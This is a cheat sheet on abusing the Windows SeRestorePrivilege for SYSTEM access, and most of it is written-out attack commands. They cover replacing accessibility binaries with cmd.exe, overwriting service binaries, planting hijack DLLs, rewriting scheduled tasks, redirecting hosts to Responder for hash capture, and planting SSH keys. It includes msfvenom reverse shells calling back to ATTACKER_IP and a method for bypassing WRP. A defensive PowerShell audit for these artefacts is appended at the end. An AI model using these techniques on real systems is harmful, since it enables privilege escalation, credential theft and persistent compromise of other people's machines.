Overview
SeRestorePrivilege grants write access to any file or folder regardless of its NTFS ACL (it also implies WRITE_DAC/WRITE_OWNER, so DACLs and ownership can be changed). The practical result is an arbitrary file write that converts directly into code execution as SYSTEM: overwrite protected binaries, plant DLLs in System32, modify scheduled tasks.
Default on Administrators (elevated), Backup Operators, SYSTEM, and Server Operators on a DC.
Check if Enabled
whoami /priv | findstr /i "SeRestorePrivilege"
Shows Disabled? It is still usable: a disabled privilege is present in the token and can be enabled at runtime with AdjustTokenPrivileges (see the PowerShell method below).
Replace Accessibility Binary — SYSTEM Shell at Login
Accessibility binaries launch as SYSTEM from the lock/login screen. Replace with cmd.exe.
copy C:\Windows\System32\utilman.exe C:\Windows\System32\utilman.exe.bak
copy C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe /Y
Trigger: lock screen (Win+L) → click Ease of Access → SYSTEM shell. Works pre-auth over RDP (xfreerdp3 /v:TARGET /cert:ignore).
Same technique for every accessibility binary:
| Binary | Trigger |
|---|---|
| utilman.exe | Ease of Access button |
| sethc.exe | Shift ×5 (Sticky Keys) — fires at RDP login |
| Narrator.exe / Magnify.exe / osk.exe | Ease of Access menu |
| DisplaySwitch.exe | Win+P |
Cleanup: restore the .bak.
Defender/AMSI may flag overwriting these. Check first: sc query WinDefend. On Windows 10 1809 and later, Windows Resource Protection (WRP) may block the copy; use the PowerShell backup-semantics method below.
Overwrite Service Binary
wmic service where "StartMode='Auto' AND StartName='LocalSystem'" get Name,PathName
sc qc VulnService
sc stop VulnService
copy "C:\Program Files\VulnService\app.exe" "C:\Program Files\VulnService\app.exe.bak"
copy shell.exe "C:\Program Files\VulnService\app.exe" /Y
sc start VulnService
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o shell.exe
DLL Hijack — System32 / PATH
Write a malicious DLL where a SYSTEM service expects one. Find missing DLLs with Procmon (filter: Result is NAME NOT FOUND and Path ends with .dll).
| Service | Missing DLL |
|---|---|
| IKEEXT | wlbsctrl.dll |
| SessionEnv | TSMSISrv.dll |
| NetMan | wlanhlp.dll |
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o wlbsctrl.dll
copy wlbsctrl.dll C:\Windows\System32\wlbsctrl.dll
sc stop IKEEXT && sc start IKEEXT
Scheduled Task Hijack
Task definitions are stored as XML under C:\Windows\System32\Tasks. Overwrite the Exec command of a task that runs as SYSTEM.
Get-ScheduledTask | Where-Object { $_.Principal.UserId -match 'SYSTEM' } | Select TaskName, TaskPath
$xml = [xml](Get-Content "C:\Windows\System32\Tasks\TargetTask")
$xml.Task.Actions.Exec.Command = "C:\Windows\Temp\shell.exe"
$xml.Save("C:\Windows\System32\Tasks\TargetTask")
schtasks /run /tn "TargetTask"
Modify hosts File
C:\Windows\System32\drivers\etc\hosts is normally protected. Redirect internal hostnames to a Responder host to capture Net-NTLMv2.
echo ATTACKER_IP fileserver.corp.local >> C:\Windows\System32\drivers\etc\hosts
sudo responder -I eth0 -v
Write SSH authorized_keys
If OpenSSH Server is installed (sc query sshd), plant your key for passwordless access.
echo ssh-ed25519 AAAA...key attacker@kali > C:\ProgramData\ssh\administrators_authorized_keys
icacls C:\ProgramData\ssh\administrators_authorized_keys /inheritance:r
icacls C:\ProgramData\ssh\administrators_authorized_keys /grant "BUILTIN\Administrators:F" /grant "NT AUTHORITY\SYSTEM:F"
ssh -i ~/.ssh/id_ed25519 administrator@TARGET
PowerShell Method (Backup Semantics)
When copy fails because of WRP, enable the privilege at runtime and open the destination from .NET with FILE_FLAG_BACKUP_SEMANTICS (0x02000000), the flag under which the restore privilege is applied to the open. Enable the privilege with the standard AdjustTokenPrivileges P/Invoke (see the snippet on SeCreateTokenPrivilege), then:
$src = [System.IO.File]::OpenRead("C:\Windows\Temp\shell.exe")
$dst = [System.IO.FileStream]::new("C:\Windows\System32\target.exe",
    [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write,
    [System.IO.FileShare]::None, 4096, [System.IO.FileOptions]0x02000000)
$src.CopyTo($dst); $dst.Close(); $src.Close()
Combine with SeBackupPrivilege
Backup Operators hold both → arbitrary read AND write. Dump SAM/NTDS.dit (read) then plant a backdoor (write). Read side documented in SeBackupPrivilege.
Quick Reference
| Technique | Target | Result |
|---|---|---|
| Replace utilman.exe / sethc.exe | Lock / RDP login | SYSTEM shell |
| Overwrite service binary | SYSTEM service | SYSTEM on restart |
| Plant DLL (System32 / PATH) | Missing DLL | SYSTEM on service start |
| Modify scheduled task XML | System32\Tasks\* | SYSTEM on trigger |
| Modify hosts | DNS redirect | Hash capture / MITM |
| Write SSH authorized_keys | OpenSSH | Persistent access |
| Combine with SeBackup | SAM/NTDS + persistence | Full compromise |
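As an added defensive audit (example code, not part of the original cheat sheet), the PowerShell below checks for the artefacts the techniques above leave behind: an accessibility binary that is really cmd.exe, a SYSTEM scheduled task whose action runs from outside the Windows or Program Files trees, uncommented hosts entries, and an administrators_authorized_keys file. Windows catalog-signs these binaries by hash, so a renamed cmd.exe still passes Get-AuthenticodeSignature; the script therefore compares the version resource's OriginalFilename and the SHA-256 of cmd.exe instead. It assumes default paths and an elevated shell; the function name is my own.

```powershell
# Added defensive audit for the SeRestorePrivilege abuses above (example, not from the original page).
# Run elevated; all paths are the Windows defaults. Output is a list to review, not a verdict.
function Get-SeRestoreAbuseFindings {
    $findings = @()
    $sys32    = "$env:SystemRoot\System32"
    $cmdHash  = (Get-FileHash -Algorithm SHA256 "$sys32\cmd.exe").Hash

    # 1. Accessibility binaries: catalog signing is per hash, so a renamed cmd.exe still reports a
    #    Valid signature. Compare the hash to cmd.exe and the OriginalFilename to the expected name.
    foreach ($name in 'utilman.exe','sethc.exe','Narrator.exe','Magnify.exe','osk.exe','DisplaySwitch.exe') {
        $path = Join-Path $sys32 $name
        if (-not (Test-Path $path)) { continue }
        $orig = (Get-Item $path).VersionInfo.OriginalFilename
        $hash = (Get-FileHash -Algorithm SHA256 $path).Hash
        if ($hash -eq $cmdHash) {
            $findings += [pscustomobject]@{ Check='AccessibilityBinary'; Item=$path; Detail='Byte-identical to cmd.exe' }
        } elseif ($orig -and ([IO.Path]::GetFileNameWithoutExtension($orig) -ne [IO.Path]::GetFileNameWithoutExtension($name))) {
            $findings += [pscustomobject]@{ Check='AccessibilityBinary'; Item=$path; Detail="OriginalFilename is '$orig'" }
        }
    }

    # 2. SYSTEM scheduled tasks whose Exec action points outside the Windows / Program Files trees.
    $trusted = @("$env:SystemRoot", "$env:ProgramFiles", "${env:ProgramFiles(x86)}")
    foreach ($task in Get-ScheduledTask | Where-Object { $_.Principal.UserId -match 'SYSTEM' }) {
        foreach ($action in $task.Actions) {
            $exe = $action.Execute
            if (-not $exe) { continue }
            $exe = [Environment]::ExpandEnvironmentVariables($exe.Trim('"'))
            $inTrusted = $trusted | Where-Object { $_ -and $exe.StartsWith($_, 'OrdinalIgnoreCase') }
            if (-not $inTrusted) {
                $findings += [pscustomobject]@{ Check='ScheduledTask'; Item="$($task.TaskPath)$($task.TaskName)"; Detail="Runs $exe" }
            }
        }
    }

    # 3. Any uncommented hosts entry, and an OpenSSH admin key file that should only exist if you created it.
    $hosts = "$sys32\drivers\etc\hosts"
    foreach ($line in Get-Content $hosts | Where-Object { $_ -match '^\s*[^#\s]' }) {
        $findings += [pscustomobject]@{ Check='HostsFile'; Item=$hosts; Detail=$line.Trim() }
    }
    $keys = "$env:ProgramData\ssh\administrators_authorized_keys"
    if (Test-Path $keys) {
        $findings += [pscustomobject]@{ Check='SshAuthorizedKeys'; Item=$keys; Detail="$(@(Get-Content $keys).Count) key line(s) present" }
    }
    return $findings
}

Get-SeRestoreAbuseFindings | Format-Table -AutoSize
```

Legitimate tasks that run from ProgramData or a vendor directory will appear under ScheduledTask; the value of the script is in diffing its output against a known-good baseline of the same host.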